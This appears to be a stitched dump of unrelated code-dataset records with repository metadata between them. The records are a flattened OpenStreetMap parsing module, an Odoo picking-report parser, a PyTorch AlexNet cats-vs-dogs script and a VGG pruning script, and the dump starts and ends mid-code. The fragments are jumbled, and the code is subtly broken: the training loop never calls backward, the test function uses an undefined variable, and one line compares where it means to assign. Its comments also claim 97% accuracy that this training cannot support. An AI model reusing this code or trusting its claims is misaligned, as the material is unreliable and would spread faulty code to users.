fast): self._nodes[node.osm_id] = (node.longitude, node.latitude) def __getitem__(self, index): if index in self._nodes: return self._nodes[index] raise KeyError() def __iter__(self): yield from self._nodes.items() class NodesPacked(): """A more efficient storage method than the :class:`Nodes` implements, but at the cost of slower querying. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): if file is not None: interim_list = [] for node in _all_elements_of_type(file, "node", fast): interim_list.append( (node.osm_id, node.longitude, node.latitude) ) self._osm_ids, self._longitude, self._latitude = self._arrays_from_unordered_list(interim_list) else: self._osm_ids, self._longitude, self._latitude = None, None, None def __getitem__(self, index): i = _bisect.bisect_left(self._osm_ids, index) if i == len(self._osm_ids) or self._osm_ids[i] != index: raise KeyError() lon, lat = self._longitude[i], self._latitude[i] return lon / 1e7, lat / 1e7 def __iter__(self): for osm_id, lon, lat in zip(self._osm_ids, self._longitude, self._latitude): yield (osm_id, (lon / 1e7, lat / 1e7)) @staticmethod def _from_float(fl): if fl >= 0: return int(fl * 1e7 + 0.5) return int(fl * 1e7 - 0.5) @staticmethod def _arrays_from_unordered_list(input): input.sort(key = lambda tri : tri[0]) osm_ids = _array.array("Q") lons, lats = _array.array("l"), _array.array("l") for (osm_id, lon, lat) in input: osm_ids.append(osm_id) lons.append(NodesPacked._from_float(lon)) lats.append(NodesPacked._from_float(lat)) return osm_ids, lons, lats @staticmethod def from_Nodes(nodes): """Construct a new instance from an instance of :class:`Nodes`.""" new = NodesPacked(None) interim_list = [ (osm_id, lon, lat) for osm_id, (lon, lat) in nodes._nodes.items() ] new._osm_ids, new._longitude, new._latitude = NodesPacked._arrays_from_unordered_list(interim_list) return new class Ways(): """Extracts (only) the list of nodes for each way. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): self._ways = dict() for way in _all_elements_of_type(file, "way", fast): self._ways[way.osm_id] = way.nodes def __getitem__(self, index): if index in self._ways: return self._ways[index] raise KeyError() def __iter__(self): yield from self._ways.items() class Relations(): """Extracts (only) the list of members of each relation. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse.untitled0.py :param fast: If True (default) then assume the input XML file is organised so that all nodes occur first, then all ways, and then all relations. """ def __init__(self, file, fast=True): self._rels = dict() for rel in _all_elements_of_type(file, "relation", fast): self._rels[rel.osm_id] = rel.members def __getitem__(self, index): if index in self._rels: return self._rels[index] raise KeyError() def __iter__(self): yield from self._rels.items() class Tags(): """Stores all the tags in a lookup optimised for finding the objects (nodes, ways and relations) which have a given tag. :param file: Construct from the filename or file-like object; can be anything which :module:`digest` can parse. """ def __init__(self, file): self.from_nodes = _defaultdict(list) self.from_ways = _defaultdict(list) self.from_relations = _defaultdict(list) lookup = {"node" : self.from_nodes, "way": self.from_ways, "relation": self.from_relations } for element in _all_elements(file): d = lookup[element.name] for key_pair in element.tags.items(): d[key_pair].append(element.osm_id) @staticmethod def _by_key_pair(dictionary, key_pair): if key_pair in dictionary: return dictionary[key_pair] return [] @staticmethod def _by_key(dictionary, key): out = [] for key_pair in dictionary: if key_pair[0] == key: for osm_id in dictionary[key_pair]: out.append( (key_pair[1], osm_id) ) return out @property def all_node_tags(self): """Set of all `(key, value)` pairs of tags of nodes.""" return set(self.from_nodes) @property def all_node_tag_keys(self): """Set of all keys which occur on tags of nodes.""" return set(k for (k,v) in self.from_nodes) @property def all_way_tags(self): """Set of all `(key, value)` pairs of tags of ways.""" return set(self.from_ways) @property def all_way_tag_keys(self): """Set of all keys which occur on tags of ways.""" return set(k for (k,v) in self.from_ways) @property def all_relation_tags(self): """Set of all `(key, value)` pairs of tags of relations.""" return set(self.from_relations) @property def all_relation_tag_keys(self): """Set of all keys which occur on tags of relations.""" return set(k for (k,v) in self.from_relations) def from_key_value(self, key, value): """Return a list of all element which have the tag `{key: value}`. :param key: The key to search for tags with. :param value: The value to search for tags with. :return: A list of pairs `(typename, osm_id)` where `typename` is one of "node", "way" or "relation" and `osm_id` is the id of the element. """ out = [] for osm_id in self.nodes((key, value)): out.append(("node", osm_id)) for osm_id in self.ways((key, value)): out.append(("way", osm_id)) for osm_id in self.relations((key, value)): out.append(("relation", osm_id)) return out def from_key(self, key): """Return a list of all element which have the tag `key`. :param key: The key to search for tags with. :return: A list of triple `(typename, value, osm_id)` where `typename` is one of "node", "way" or "relation", `value` is the value of the tag, and `osm_id` is the id of the element. """ out = [] for value, osm_id in self.nodes_from_key(key): out.append(("node", value, osm_id)) for value, osm_id in self.ways_from_key(key): out.append(("way", value, osm_id)) for value, osm_id in self.relations_from_key(key): out.append(("relation", value, osm_id)) return out def nodes(self, key_pair): """Returns a list of all the nodes which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of nodes with this tag. """ return self._by_key_pair(self.from_nodes, key_pair) def nodes_from_key(self, key): """Returns a list of all the nodes which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the node. """ return self._by_key(self.from_nodes, key) def ways(self, key_pair): """Returns a list of all the ways which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of ways with this tag. """ return self._by_key_pair(self.from_ways, key_pair) def ways_from_key(self, key): """Returns a list of all the ways which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the way. """ return self._by_key(self.from_ways, key) def relations(self, key_pair): """Returns a list of all the relations which have the tag `{key: value}`. :param key_pair: `(key, value)` of tag to search for. :return: list, maybe empty, of ids of relations with this tag. """ return self._by_key_pair(self.from_relations, key_pair) def relations_from_key(self, key): """Returns a list of all the relations which have the tag key. :param key: The key of tags to search for. :return: list, maybe empty, of pairs `(value, id)` where `value` is the value from the tag, and `id` is osm id of the relation. """ return self._by_key(self.from_relations, key) class TagsById(): """A lookup from osm id number to tags. :param tags: An instance of :class:`Tags`. """ def __init__(self, tags): if not isinstance(tags, Tags): raise ValueError("Need an instance of Tags for construction.") self._nodes = _defaultdict(dict) self._ways = _defaultdict(dict) self._relations = _defaultdict(dict) self._populate(tags.from_nodes, self._nodes) self._populate(tags.from_ways, self._ways) self._populate(tags.from_relations, self._relations) @staticmethod def _populate(input, output): for (key, value), ids in input.items(): for osm_id in ids: output[osm_id][key] = value def node(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._nodes: return self._nodes[osm_id] return dict() def way(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._ways: return self._ways[osm_id] return dict() def relation(self, osm_id): """Return a (possibly empty) dictionary of tags for the node with this id. """ if osm_id in self._relations: return self._relations[osm_id] return dict() def pythonify_and_pickle(file, out_filename): """Convert all the data in the XML file and save as pickled files for nodes, ways, relations and tags separately. :param file: Filename (the file will be opened 4 times, so passing a file object will not work). Can be anything which :module:`digest` can parse. :param out_filename: If is `test` then writes files `test_nodes.pic.xz` through `test_tags.pic.xz` :return: A tuple of the 4 output filenames for nodes, ways, relations and tags. """ obj = NodesPacked(file) out = [out_filename + "_nodes.pic.xz"] pickle(obj, out[0]) for typpe, name in [(Ways, "ways"), (Relations, "relations"), (Tags, "tags")]: obj = None obj = typpe(file) name = "{}_{}.pic.xz".format(out_filename, name) pickle(obj, name) out.append(name) return out
4,228
0
608
27998331b309e55cd8a388ea6423e56a7a5e56ce
3,081
py
Python
odoo/custom/src/private/rml_reports/stock/picking.py
ecosoft-odoo/mh-doodba
093f14850aaff337951b4829b24bf32eee6e6d40
[ "BSL-1.0" ]
1
2021-10-03T08:11:18.000Z
2021-10-03T08:11:18.000Z
odoo/custom/src/private/rml_reports/stock/picking.py
ecosoft-odoo/mh-doodba
093f14850aaff337951b4829b24bf32eee6e6d40
[ "BSL-1.0" ]
null
null
null
odoo/custom/src/private/rml_reports/stock/picking.py
ecosoft-odoo/mh-doodba
093f14850aaff337951b4829b24bf32eee6e6d40
[ "BSL-1.0" ]
null
null
null
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from report import report_sxw from osv import osv import pooler report_sxw.report_sxw('report.stock.picking.list.mh','stock.picking.out','',parser=picking, header="internal") # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
45.308824
123
0.61863
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from report import report_sxw from osv import osv import pooler class picking(report_sxw.rml_parse): def __init__(self, cr, uid, name, context): super(picking, self).__init__(cr, uid, name, context=context) self.localcontext.update({ 'time': time, 'get_product_desc':self.get_product_desc, 'display_invoice_address':self.display_invoice_address }) def get_product_desc(self,move_line): desc = move_line.name.replace(move_line.product_id.default_code,'').replace('[]','') if move_line.product_id.partner_barcode: desc = desc + ' ' + '(' + move_line.product_id.partner_barcode + ')' desc = desc + ' ' + '[' + move_line.product_id.product_main_code + ']' return desc def display_invoice_address(self,picking): # Only for this report, update printed = True self.pool.get('stock.picking.out').write(self.cr, self.uid, picking.id, {'printed':True}) # Get the SO order_obj = self.pool.get('sale.order') order_ids = order_obj.search(self.cr, self.uid, [('name','=',picking.origin)], limit=1) if len(order_ids) == 0: # Sale Order not found. return False order = order_obj.browse(self.cr, self.uid, order_ids[0]) # Get Invoice Address object if not (order.partner_invoice_id and order.partner_invoice_id.id): return False address_string = (order.partner_invoice_id.title.name or '') + ' ' + order.partner_invoice_id.name + '\n' address_string += self.pool.get('res.partner')._display_address(self.cr, self.uid, order.partner_invoice_id) + '\n' address_string += order.partner_invoice_id.phone or order.partner_invoice_id.email or '' return address_string report_sxw.report_sxw('report.stock.picking.list.mh','stock.picking.out','',parser=picking, header="internal") # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
1,703
15
126
d4c29d051bf16489715a8cedb73ff6c590a2f1fb
7,846
py
Python
CatVsDogs(TestLoop,DogsOverfitting97%,Cats(veryLess)).py
shyamgupta196/LearningPyTorch
a585b708039357207ad4d3b29a3fc7bd2d1cc7e8
[ "Apache-2.0" ]
1
2021-04-06T11:26:39.000Z
2021-04-06T11:26:39.000Z
CatVsDogs(TestLoop,DogsOverfitting97%,Cats(veryLess)).py
shyamgupta196/LearningPyTorch
a585b708039357207ad4d3b29a3fc7bd2d1cc7e8
[ "Apache-2.0" ]
null
null
null
CatVsDogs(TestLoop,DogsOverfitting97%,Cats(veryLess)).py
shyamgupta196/LearningPyTorch
a585b708039357207ad4d3b29a3fc7bd2d1cc7e8
[ "Apache-2.0" ]
null
null
null
""" In this TorchDaily we will TRAIN A MODEL USING TRANSFER LEARNING Cats Vs Dogs Dataset EARLIER ACC==14% OR LESS NOW ITS 70% AND MORE (BUT ONLY FOR DOGS ) ### Cats are very poorly classified (IDK WHY but soon i will figure that out) THE POWER OF ALEXNET (PRETRAINED MODELS IS VISIBLE) DATE ==> 10-05-21 """ import torch import torch.nn as nn from torch.utils.data import DataLoader import matplotlib.pyplot as plt from torchvision import transforms, datasets, models import torchvision from tqdm import tqdm import os import PIL.Image as Image device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) # prepare data convert = transforms.Compose( [ transforms.Resize((128, 128)), transforms.RandomHorizontalFlip(0.2), transforms.ToTensor(), ] ) # dataloader data = datasets.ImageFolder(root="PetImages/", transform=convert) Loader = DataLoader(data, batch_size=64, shuffle=True) MAP = {0: "Cat", 1: "Dog"} ##UNCOMMENT FOR SEEING THE DATA IMAGES # fig, ax = plt.subplots(8, 8, figsize=(20, 20)) # fig.suptitle("Dogs And Cats IMages") # for i, (img, lab) in zip(range(0, 8 * 8), Loader): # x = i // 8 # y = i % 8 # print(f"{x},{y}") # ax[x, y].imshow(img[i].squeeze().permute(1,2,0)) # ax[x, y].set_title(f"{lab[i]}") # ax[x, y].axis("off") # plt.show() # # Add on classifier # # HOW TO CHANGE THE INPUT LAYER WHICH ACCEPTS THE 224*224 INPUT # # I WANNA CHANGE THAT TO 128*128 THIS SIZE WILL SUFFICE # We Use AlexNet for transfer learning ##answers below alexnet = torchvision.models.alexnet(pretrained=True) for param in alexnet.parameters(): param.requires_grad = False # Add a avgpool here avgpool = nn.AdaptiveAvgPool2d((7, 7)) # Replace the classifier layer # to customise it according to our output alexnet.classifier = nn.Sequential( nn.Linear(256 * 7 * 7, 1024), nn.Linear(1024, 256), nn.Linear(256, 2), ) # putting model in a training mode alexnet.train() print(alexnet) criterion = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(alexnet.parameters(), lr=0.001) EPOCHS = 1 TRAIN = False losses = [] if TRAIN: training_loop(alexnet, optimizer, EPOCHS) plt.plot(losses) plt.show() TEST = False history = [] if TEST: test() print("Validation Complete") with open("ModelHistory.txt", "w") as f: for i in history: f.writelines(f"{i}") print("Validation Complete") ## This model reported a accuracy of 97%(on DOGS ONLY) using AlexNet ## the Pros of using a pretrained model is clearly seen here ## date -- 13th May 2021 (thursday) ####ACCURACY AND OTHER THINGS TOO TO BE APPENDED SOON ###### PREDICT = True def predict(model, test_image_name): """ Function to predict the class of a single test image Parameters :param model: Model to test :param test_image_name: Test image """ transform = transforms.Compose( [transforms.Resize((128, 128)), transforms.ToTensor()] ) test_image = Image.open(test_image_name) test_image_tensor = transform(test_image).to(device) plt.imshow(test_image) plt.imshow(test_image_tensor.squeeze().permute(1, 2, 0)) plt.show() with torch.no_grad(): model.eval() # Model outputs log probabilities test_image_tensor = test_image_tensor.unsqueeze(0) print(test_image_tensor.shape) x = alexnet.features(test_image_tensor) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) out = alexnet.classifier(x) ps = torch.exp(out) topk, topclass = ps.topk(2, dim=1) for i in range(2): print( "Predcition", i + 1, ":", f"topclass {topclass.numpy()}", MAP[topclass.numpy()[0][i]], ", Score: ", f"topk {topk.numpy()}", topk.numpy()[0][i], ) print(f"out: {out}") if PREDICT: checkpoint = torch.load("catsvdogs.pth") alexnet.load_state_dict(checkpoint["state_dict"]) optimizer.load_state_dict(checkpoint["optimizer"]) for params in alexnet.parameters(): params.requires_grad == False predict(alexnet, "PetTest/CatTest.jpg")
29.8327
114
0.582207
""" In this TorchDaily we will TRAIN A MODEL USING TRANSFER LEARNING Cats Vs Dogs Dataset EARLIER ACC==14% OR LESS NOW ITS 70% AND MORE (BUT ONLY FOR DOGS ) ### Cats are very poorly classified (IDK WHY but soon i will figure that out) THE POWER OF ALEXNET (PRETRAINED MODELS IS VISIBLE) DATE ==> 10-05-21 """ import torch import torch.nn as nn from torch.utils.data import DataLoader import matplotlib.pyplot as plt from torchvision import transforms, datasets, models import torchvision from tqdm import tqdm import os import PIL.Image as Image device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) # prepare data convert = transforms.Compose( [ transforms.Resize((128, 128)), transforms.RandomHorizontalFlip(0.2), transforms.ToTensor(), ] ) # dataloader data = datasets.ImageFolder(root="PetImages/", transform=convert) Loader = DataLoader(data, batch_size=64, shuffle=True) MAP = {0: "Cat", 1: "Dog"} ##UNCOMMENT FOR SEEING THE DATA IMAGES # fig, ax = plt.subplots(8, 8, figsize=(20, 20)) # fig.suptitle("Dogs And Cats IMages") # for i, (img, lab) in zip(range(0, 8 * 8), Loader): # x = i // 8 # y = i % 8 # print(f"{x},{y}") # ax[x, y].imshow(img[i].squeeze().permute(1,2,0)) # ax[x, y].set_title(f"{lab[i]}") # ax[x, y].axis("off") # plt.show() # # Add on classifier # # HOW TO CHANGE THE INPUT LAYER WHICH ACCEPTS THE 224*224 INPUT # # I WANNA CHANGE THAT TO 128*128 THIS SIZE WILL SUFFICE # We Use AlexNet for transfer learning ##answers below alexnet = torchvision.models.alexnet(pretrained=True) for param in alexnet.parameters(): param.requires_grad = False # Add a avgpool here avgpool = nn.AdaptiveAvgPool2d((7, 7)) # Replace the classifier layer # to customise it according to our output alexnet.classifier = nn.Sequential( nn.Linear(256 * 7 * 7, 1024), nn.Linear(1024, 256), nn.Linear(256, 2), ) # putting model in a training mode alexnet.train() print(alexnet) criterion = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(alexnet.parameters(), lr=0.001) EPOCHS = 1 TRAIN = False losses = [] def training_loop(model, optimizer, epochs): for epoch in range(epochs): try: for img, lab in tqdm(Loader): img = img.to(device) lab = lab.to(device) x = alexnet.features(img) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) predictions = alexnet.classifier(x) loss = criterion(predictions, lab) optimizer.step() optimizer.zero_grad() losses.append(loss.item()) print(f"loss: {loss.item():.4f}") except Exception as e: print(str(e)) state = { "epoch": epoch, "state_dict": alexnet.state_dict(), "optimizer": optimizer.state_dict(), } torch.save(state, "catsvdogs.pth") if TRAIN: training_loop(alexnet, optimizer, EPOCHS) plt.plot(losses) plt.show() TEST = False history = [] def test(): test = datasets.ImageFolder(root="PetTest/", transform=convert) testLoader = DataLoader(test, batch_size=16, shuffle=False) checkpoint = torch.load("catsvdogs.pth") alexnet.load_state_dict(checkpoint["state_dict"]) optimizer.load_state_dict(checkpoint["optimizer"]) for params in alexnet.parameters(): params.requires_grad == False print(alexnet) with torch.no_grad(): # Set to evaluation mode alexnet.eval() train_data_size = 101 valid_data_size = 101 # Validation loop # Loss and Accuracy within the epoch valid_loss = 0.0 valid_acc = 0.0 for j, (inputs, labels) in enumerate(testLoader): inputs = inputs.to(device) labels = labels.to(device) # Forward pass - compute outputs on input data using the model x = alexnet.features(inputs) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) outputs = alexnet.classifier(x) # Compute loss loss = criterion(outputs, labels) # Compute the total loss for the batch and add it to valid_loss valid_loss += loss.item() * inputs.size(0) # Calculate validation accuracy ret, predictions = torch.max(outputs.data, 1) correct_counts = predictions.eq(labels.data.view_as(predictions)) # Convert correct_counts to float and then compute the mean acc = torch.mean(correct_counts.type(torch.FloatTensor)) # Compute total accuracy in the whole batch and add to valid_acc valid_acc += acc.item() * inputs.size(0) print( """Validation Batch number: {:03d}, Validation: Loss: {:.4f}, Accuracy: {:.4f}""".format(j, loss.item(), acc.item() ) ) # Find average training loss and training accuracy avg_valid_loss = valid_loss / valid_data_size avg_valid_acc = valid_acc / valid_data_size history.append([avg_valid_loss, avg_valid_acc]) print( " Training: Loss: {:.4f}, Accuracy: {:.4f}%, \n\t\tValidation : Loss : {:.4f}, Accuracy: {:.4f}%".format( avg_train_loss, avg_train_acc * 100, avg_valid_loss, avg_valid_acc * 100, ) ) plt.plot(valid_acc) plt.plot(valid_loss) plt.show() if TEST: test() print("Validation Complete") with open("ModelHistory.txt", "w") as f: for i in history: f.writelines(f"{i}") print("Validation Complete") ## This model reported a accuracy of 97%(on DOGS ONLY) using AlexNet ## the Pros of using a pretrained model is clearly seen here ## date -- 13th May 2021 (thursday) ####ACCURACY AND OTHER THINGS TOO TO BE APPENDED SOON ###### PREDICT = True def predict(model, test_image_name): """ Function to predict the class of a single test image Parameters :param model: Model to test :param test_image_name: Test image """ transform = transforms.Compose( [transforms.Resize((128, 128)), transforms.ToTensor()] ) test_image = Image.open(test_image_name) test_image_tensor = transform(test_image).to(device) plt.imshow(test_image) plt.imshow(test_image_tensor.squeeze().permute(1, 2, 0)) plt.show() with torch.no_grad(): model.eval() # Model outputs log probabilities test_image_tensor = test_image_tensor.unsqueeze(0) print(test_image_tensor.shape) x = alexnet.features(test_image_tensor) x = avgpool(x) x = x.view(-1, 256 * 7 * 7) out = alexnet.classifier(x) ps = torch.exp(out) topk, topclass = ps.topk(2, dim=1) for i in range(2): print( "Predcition", i + 1, ":", f"topclass {topclass.numpy()}", MAP[topclass.numpy()[0][i]], ", Score: ", f"topk {topk.numpy()}", topk.numpy()[0][i], ) print(f"out: {out}") if PREDICT: checkpoint = torch.load("catsvdogs.pth") alexnet.load_state_dict(checkpoint["state_dict"]) optimizer.load_state_dict(checkpoint["optimizer"]) for params in alexnet.parameters(): params.requires_grad == False predict(alexnet, "PetTest/CatTest.jpg")
3,367
0
50
10a37586581b383194d5be72752acbb49c929082
40,380
py
Python
score_based_pruning.py
Joey61Liuyi/Early-Bird-Tickets
7bb23243bc4343519d58d828f0d3254e80c5fedd
[ "MIT" ]
null
null
null
score_based_pruning.py
Joey61Liuyi/Early-Bird-Tickets
7bb23243bc4343519d58d828f0d3254e80c5fedd
[ "MIT" ]
null
null
null
score_based_pruning.py
Joey61Liuyi/Early-Bird-Tickets
7bb23243bc4343519d58d828f0d3254e80c5fedd
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # @Time : 2021/12/27 16:34 # @Author : LIU YI import argparse import copy import random import pandas as pd import numpy as np import os import torch import torch.nn as nn from torch.autograd import Variable from torchvision import datasets, transforms import wandb # from models import * import models import wandb # os.environ['CUDA_VISIBLE_DEVICES'] = '4' from model_complexity import get_model_infos if __name__ == '__main__': parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune') parser.add_argument('--dataset', type=str, default='cifar100', help='training dataset (default: cifar10)') parser.add_argument('--test-batch-size', type=int, default=128, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--depth', type=int, default=16, help='depth of the vgg') parser.add_argument('--percent', type=float, default=0.5, help='scale sparse rate (default: 0.5)') parser.add_argument('--model', default='', type=str, metavar='PATH', help='path to the model (default: none)') parser.add_argument('--save', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--save_1', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--start_epoch', default=1, type=int, metavar='N', help='manual start epoch number') parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number') # quantized parameters parser.add_argument('--bits_A', default=8, type=int, help='input quantization bits') parser.add_argument('--bits_W', default=8, type=int, help='weight quantization bits') parser.add_argument('--bits_G', default=8, type=int, help='gradient quantization bits') parser.add_argument('--bits_E', default=8, type=int, help='error quantization bits') parser.add_argument('--bits_R', default=16, type=int, help='rand number quantization bits') parser.add_argument('--arch', default='vgg', type=str, help='architecture to use') # multi-gpus parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() seed = 1 random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) if not os.path.exists(args.save): os.makedirs(args.save) gpu = args.gpu_ids gpu_ids = args.gpu_ids.split(',') args.gpu_ids = [] for gpu_id in gpu_ids: id = int(gpu_id) if id > 0: args.gpu_ids.append(id) if len(args.gpu_ids) > 0: torch.cuda.set_device(args.gpu_ids[0]) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") if args.arch.endswith('lp'): # model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth) model = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth) elif args.dataset == 'imagenet': model = models.__dict__[args.arch](pretrained=False) if len(args.gpu_ids) > 1: model = torch.nn.DataParallel(model, device_ids=args.gpu_ids) else: model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth) if args.dataset == 'cifar10': train_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) else: train_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) if args.cuda: model.cuda() wandb_project = 'pruning_score' name = 'with_out_normalization_60' # wandb.init(project=wandb_project, name=name) # # random_search(cfg_mask_all, args.percent) # channel_score_search(model, args.percent, train_loader) # greedy_search(model, args.percent, train_loader) # layer_remove_check(model, train_loader) # rate_check(model, args.percent, train_loader) channel_remove_check(model, train_loader, 0.61, 0.2) # layer_wise_pruning(model, train_loader, 0.8) # # data = np.load('1633.66.npy', allow_pickle=True) # data = data.item() # cfg = data['cfg'] # cfg_mask = data['mask_cfg'] # for i in range(len(cfg_mask)): # cfg_mask[i] = np.asarray(cfg_mask[i].cpu().numpy()) # score = check_score(model, cfg, cfg_mask) # print(score)
37.879925
146
0.58316
# -*- coding: utf-8 -*- # @Time : 2021/12/27 16:34 # @Author : LIU YI import argparse import copy import random import pandas as pd import numpy as np import os import torch import torch.nn as nn from torch.autograd import Variable from torchvision import datasets, transforms import wandb # from models import * import models import wandb # os.environ['CUDA_VISIBLE_DEVICES'] = '4' from model_complexity import get_model_infos def create_model(model, cfg, cfg_mask): while 0 in cfg: cfg.remove(0) # if args.arch.endswith('lp'): # # model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth) # newmodel = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth) # elif args.dataset == 'imagenet': # newmodel = models.__dict__[args.arch](pretrained=False) # if len(args.gpu_ids) > 1: # model = torch.nn.DataParallel(model, device_ids=args.gpu_ids) # else: newmodel = models.__dict__['vgg'](dataset='cifar100', cfg = cfg) # for [m0, m1] in zip(model.modules(), newmodel.modules()): # if isinstance(m0, nn.BatchNorm2d): # if np.sum(end_mask) == 0: # continue # idx1 = np.squeeze(np.argwhere(end_mask)) # if idx1.size == 1: # idx1 = np.resize(idx1, (1,)) # m1.weight.data = m0.weight.data[idx1.tolist()].clone() # m1.bias.data = m0.bias.data[idx1.tolist()].clone() # m1.running_mean = m0.running_mean[idx1.tolist()].clone() # m1.running_var = m0.running_var[idx1.tolist()].clone() # layer_id_in_cfg += 1 # start_mask = copy.copy(end_mask) # if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC # end_mask = cfg_mask[layer_id_in_cfg] # elif isinstance(m0, nn.Conv2d): # if np.sum(end_mask) == 0: # continue # idx0 = np.squeeze(np.argwhere(start_mask)) # idx1 = np.squeeze(np.argwhere(end_mask)) # # random set for test # # new_end_mask = np.asarray(end_mask.cpu().numpy()) # # new_end_mask = np.append(new_end_mask[int(len(new_end_mask)/2):], new_end_mask[:int(len(new_end_mask)/2)]) # # idx1 = np.squeeze(np.argwhere(new_end_mask)) # # # print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size)) # if idx0.size == 1: # idx0 = np.resize(idx0, (1,)) # if idx1.size == 1: # idx1 = np.resize(idx1, (1,)) # w1 = m0.weight.data[:, idx0.tolist(), :, :].clone() # w1 = w1[idx1.tolist(), :, :, :].clone() # m1.weight.data = w1.clone() # elif isinstance(m0, nn.Linear): # idx0 = np.squeeze(np.argwhere(start_mask)) # if idx0.size == 1: # idx0 = np.resize(idx0, (1,)) # m1.weight.data = m0.weight.data[:, idx0].clone() # m1.bias.data = m0.bias.data.clone() layer_id_in_cfg = 0 start_mask = np.ones(3) end_mask = cfg_mask[layer_id_in_cfg] parameter_buffer = {} for m0 in model.modules(): if isinstance(m0, nn.BatchNorm2d): key = str(layer_id_in_cfg) + 'BatchNorm' value = [] if np.sum(end_mask) == 0: pass else: idx1 = np.squeeze(np.argwhere(end_mask)) if idx1.size == 1: idx1 = np.resize(idx1, (1,)) value.append(m0.weight.data[idx1.tolist()].clone()) value.append(m0.bias.data[idx1.tolist()].clone()) value.append(m0.running_mean[idx1.tolist()].clone()) value.append(m0.running_var[idx1.tolist()].clone()) start_mask = copy.copy(end_mask) parameter_buffer[key] = value layer_id_in_cfg += 1 if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC end_mask = cfg_mask[layer_id_in_cfg] elif isinstance(m0, nn.Conv2d): key = str(layer_id_in_cfg) + 'Conv' value = [] if np.sum(end_mask) 